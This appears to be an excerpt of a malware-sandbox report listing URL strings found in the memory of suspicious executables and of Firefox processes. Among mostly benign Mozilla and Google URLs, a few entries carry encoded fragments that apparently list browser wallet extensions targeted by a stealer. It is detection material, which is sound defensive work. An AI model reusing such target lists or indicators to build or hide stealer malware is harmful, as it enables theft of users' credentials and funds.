Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 00000028.00000002.2922562667.000002619460B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixelObserver
Source: firefox.exe, 00000028.00000002.2879465068.0000026181E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2893311405.0000026190794000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2893311405.00000261907C2000.00000004.00000800.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3085149887.000001F172CE8000.00000004.00001000.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3085149887.000001F172CEF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-engine-removal
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: file.exe, 00000000.00000003.2179300138.000000002EF35000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3085149887.000001F172CEF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000003.2179300138.000000002EF35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 00000028.00000002.2879465068.0000026181EDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2893311405.0000026190794000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2893311405.00000261907C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://truecolors.firefox.comcreateContentPrincipalFromOriginremoveTabsProgressListenerchrome://bro
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E5F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: firefox.exe, 00000028.00000002.2882551286.000002618E6AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2852547493.00000130BDACA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F2B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2796627248.000002619241C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: firefox.exe, 00000028.00000002.2882551286.000002618E6AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2852547493.00000130BDACA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.000000000311E000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2796627248.000002619241C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003077000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E47000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003EB8000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.000000000311E000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/policies/privacy/
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/policies/privacy/resource://gre/modules/Log.sys.mjsipc:first-content-process-
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F2B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2796627248.000002619241C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: firefox.exe, 00000028.00000002.2884438644.000002618E7A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2889124341.000002618F1FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2889124341.000002618F10F000.00000004.00000800.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3085149887.000001F172CE8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: file.exe, 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: file.exe, 00000000.00000003.2179300138.000000002EF35000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3085149887.000001F172CEF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: file.exe, 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: file.exe, 00000000.00000003.2179300138.000000002EF35000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3085149887.000001F172CEF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.2179300138.000000002EF35000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3085149887.000001F172CEF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: file.exe, 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: file.exe, 00000000.00000003.2179300138.000000002EF35000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3085149887.000001F172CEF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: file.exe, 00000000.00000003.2179300138.000000002EF35000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3085149887.000001F172CEF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmp, firefox.exe, 00000028.00000002.2882551286.000002618E65C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2852547493.00000130BDACA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: file.exe, 00000000.00000003.2179300138.000000002EF35000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3085149887.000001F172CEF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 00000028.00000002.2882551286.000002618E65C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/p
Source: firefox.exe, 00000028.00000002.2855910749.000000BCB2BBC000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.orgo
Source: firefox.exe, 00000028.00000002.2884438644.000002618E7B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F2B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E5F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.widevine.com/
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.widevine.com/findUpdates()
Source: firefox.exe, 00000028.00000002.2931107138.0000026194CDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 00000028.00000002.2927921411.0000026194B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2893311405.00000261907C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2889124341.000002618F10F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2881327122.0000026184210000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855549826.00000130BDB50000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2851889197.00000130BD7D0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855549826.00000130BDB54000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2851889197.00000130BD7DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account
Source: firefox.exe, 00000027.00000002.2761056031.0000025949DA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account--attempting-deelevationN
Source: firefox.exe, 00000028.00000002.2881327122.00000261842A5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751223783.00000261842B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751624555.00000261842B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751919295.00000261842B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2744972040.00000261842B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account6
Source: firefox.exe, 00000028.00000002.2878694022.0000026181C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountC:
Source: firefox.exe, 00000028.00000002.2878323682.0000026181BB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountH
Source: firefox.exe, 00000028.00000003.2751223783.00000261842EB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2744972040.00000261842EC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2744972040.00000261842C6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751223783.00000261842C6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751919295.00000261842EB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2881327122.00000261842C6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751919295.00000261842C6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2881327122.00000261842F2000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2888379941.000002618F03A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855549826.00000130BDB50000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2851889197.00000130BD7D0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855549826.00000130BDB54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:
Source: firefox.exe, 00000021.00000003.2708137723.000001E539280000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2738774897.000001E539250000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2738774897.000001E539259000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2766541210.000001E53ADC0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2751984387.000001E539282000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2760124251.000001E539530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=alfon
Source: firefox.exe, 00000021.00000002.2738774897.000001E539259000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountj
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountt-
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountwebCOOP
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountwebIsolated=https://youtube.comwebIsolated=https://youtube.comfeature
Source: firefox.exe, 00000028.00000002.2879465068.0000026181E03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountx
